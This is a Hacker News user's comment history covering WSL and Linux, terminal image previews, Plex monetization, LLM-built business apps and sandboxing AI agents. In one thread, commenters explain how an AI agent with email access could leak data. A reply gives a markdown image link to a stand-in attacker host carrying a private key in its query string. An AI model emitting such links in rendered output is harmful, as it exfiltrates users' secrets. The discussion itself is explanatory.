Hacker Newsnew | past | comments | ask | show | jobs | submit | seniorThrowaway's commentslogin

I think you overestimate the public.


>I'm forced to use Microsoft products and they're actively hostile to Linux

How so? Powershell has openSSH built in now, and WSL2 basically works minus some annoying behavior and caveats. I have a Windows 11 laptop and I use it like you are saying as an ssh machine and web browser without much issue.


  > WSL2 basically works minus some annoying behavior and caveats.
It is a lot of annoying things. Everything is just so clunky and I don't think it is surprising given that it is a subsystem. At least in the mac I can still access the computer I'm typing on through the terminal. I mean yeah, I can do that with Winblows but it is non-native and clunky. I mean ever try to open a folder with a few hundred images in it? (outside the terminal) I didn't even know this was an issue that needed to be solved. For comparison, I can open a folder in the GUI of my linux machine that has 50k images (yay datasets) and in <1s I can load the previews. In my terminal, it is almost instant (yes, I can see the images in my terminal, and yes, it is this type of stuff that is a lot clunkier on Windows).

And on top of that, as frustrating as OSX is (even as terrible as OSX26 is) Winblows is worse. OSX feels disconnected, but Winblows feels hostile.


What setup do you use for seeing image previews (or the images themselves?) on a terminal in Linux?


I use yazi a fair amount but I've also configured fzf to do it. There's a lot of tools to view the images, chafa is a good one.

This definitely should be improved but I honestly don't use fzf that much. I can fix it if you really need something but I'm sure you could find it in the docs or even an LLM could handle this. Requires you to define a few variables, lsd, bat, and chafa

  $ echo $FZF_DEFAULT_OPTS 
  --ansi --preview "if file --mime-type {} | grep -qF image; then chafa --passthrough none -f sixels --size ${FZF_PREVIEW_COLUMNS}x${FZF_PREVIEW_LINES} {}; elif file --mime-type {} | grep -aF -e directory; then lsd --color always --icon always --almost-all --oneline --classify --long {}; elif file --mime-type {} | grep -aF -e binary; then strings {} | bat --color always --theme=Dracula --language c; elif file --mime-type {} | grep -aF -e text -e json -e empty; then bat --color always --theme=Dracula --style=numbers,grid --line-range :500 {}; fi"


Not the original poster but possibly lsix[1], which looking at the readme should work in certain terminals on Windows as well but I haven't tried it.

[1] https://github.com/hackerb9/lsix


I prefer termimg, which supports whatever method your terminal does for images and falls back to block characters for a lower resolution preview if your terminal has no graphics support. Use this and it works the same in whatever terminal you're using.

https://github.com/srlehn/termimg


Ok, I still don't see how that's "hostile to linux" and not just windows being crappy, which it is.


Because I didn't really speak about Microsoft's hostility to Linux.

I think the moment it turned from annoyance to hate was when they bought Skype and then removed features from the Linux version. Features like... conference calling... but there's a million things like that. Go talk to Linux nerds and I'm sure you'll get a unique story each time. We've all felt the pressure


IE. Enough said.


I think they mean that Office products and the like aren't available on a Linux OS


I'd say Macs have a far greater association with developers and tech nerds now, most code was being written for Windows and Unix back then. I was in a Computer Science University program in the 90's, and our labs were full of Unix workstations, things like SGI and Sun. When the iMac dropped, they put them in the non-CS labs. On a personal level, I've always felt the relatively current Mac==developer trend is driven in large part by fashion, but I've never been a fan of the Apple/Mac ecosystem even though I can respect what the Mac is on an engineering level. So maybe I'm biased.


It's really not that hard to run them in docker. Can give them a nestybox (with a little work) sidecar so they can run docker-in-docker. As far as permissions, the only mental model that makes sense to me is treating them like actual people. Bound their permissions in the other systems not on their own machines, basically zero trust. For instance for email, most mail apps have had delegated permissions for a while, executives use it to have their assistants read and write their mail. That's what is needed with these too.


You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.


If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.


How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def



Yes. It’s kind of like giving power of attorney to Jeffery Epstein.


Seems to be working out alright for old Wexner.


>Private entities might have their own policies, but government censorship is fairly small.

It's a distinction without a difference when these "private" entities in the West are the actual power centers. Most regular people spend their waking days at work having to follow the rules of these entities, and these entities provide the basic necessities of life. What would happen if you got banned from all the grocery stores? Put on an unemployable list for having controversial outspoken opinions?


I think this is a great analogy


While quality libraries do exist, let's not pretend that most people are validating and testing the libraries they pull in, that abandoned / unmaintained libraries aren't widely used, and that managing the dependency hell caused by libraries is free.


AI's / LLM's have already been trained on best practices for most domains. I've recently faced this decision and I went the LLM custom app path, because the software I needed was a simple internal business type app. There is open source and COTS software packages available for this kind of thing, but they tend to be massive suites trying to solve a bunch of things I don't need and also a minefield of licensing, freemium feature gating, and subject to future abandonment or rug pulls into much higher costs. Something that has happened many times. Long story short, I decided it was less work to build the exact tool I need to solve my "right now" problem, architected for future additions. I do think this is the future.


> AI's / LLM's have already been trained on best practices for most domains.

I've been at this long enough to see that today's best practices are tomorrow's anti-patterns. We have not, in fact, perfected the creation of software. And the your practices will evolve not just with the technology you use but the problem domains you're in.

I don't mean this as an argument against LLMs or vibe coding. Just that you're always going to need a fresh corpus to train them on to keep them current... and if the pool of expertly written code dries up, models will begin to stagnate.


I've been doing this a long time too. The anti-patterns tend to come from the hype cycles of "xyz shiny tool/pattern will take away all the nasty human problems that end up creating bad software". Yes, LLMs will follow this cycle too, and, I agree we are in a kind of sweet spot moment for LLMs where they were able to ingest massive amounts of training material from the open web. That will not be the case going forward, as people seek to more tightly guard their IP. The (open) question is whether the training material that exists plus whatever the tools can self generate is good enough for them to improve themselves in a closed loop cycle. LLM generated code was the right tool for my job today; doesn't mean it's the right tool for everyone's job or that it always will be. One thing constant in this industry is change. Sold as revolutionary, which is the truth, in the sense of going in circles/cycles.


Also, they've been trained on common practices more than they've been trained on best practices. And best practice is heavily context dependent anyways.


What if there is a new domain.


Then it is new for everyone, no?


Humans can learn from new experiences. LLMs have to be retrained (continuous learning isn't good enough yet), or you have to fit enough information into the context while still having enough for the task itself.


You're being a bit obtuse here yourself. The original premise of Plex was to stream your own media on your own network. I was a very early user of it, before these additional "features" that were pushed more by the Plex team than by user demand were added. They made it so you had to hack the xml config file to be able to use it in the traditional no login way, that was a pretty hostile move in my opinion and was the first eyebrow raiser for me. They also made it so you had to have a paid account to use any of the mobile clients in a clear monetization move there is no technical reason why you can't open your plex server to the internet and connect a mobile app that way, that's what jellyfin allows. I worked around this for a while by connecting to my home network on a VPN and just using chrome mobile to stream but it was less than ideal, obviously. Yes then they offered the proxying service with dynamic TLS cert generation as another paid for service, I remember it, but having never had a plex account let alone a paid one it was no interest to me. Do you work for Plex? Because your post reads like you do, especially the attitude of people not knowing what features they want and needing Plex to tell (sell) them.


Agree with others it's not solely about cost. For me it was about the very clear monetization drive Plex started doing years ago, while remaining nominally free to use for your own media. At some point, and I've already switched off it so maybe it's already happened, they will monetize tracking/meta data about what is in your own collection.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: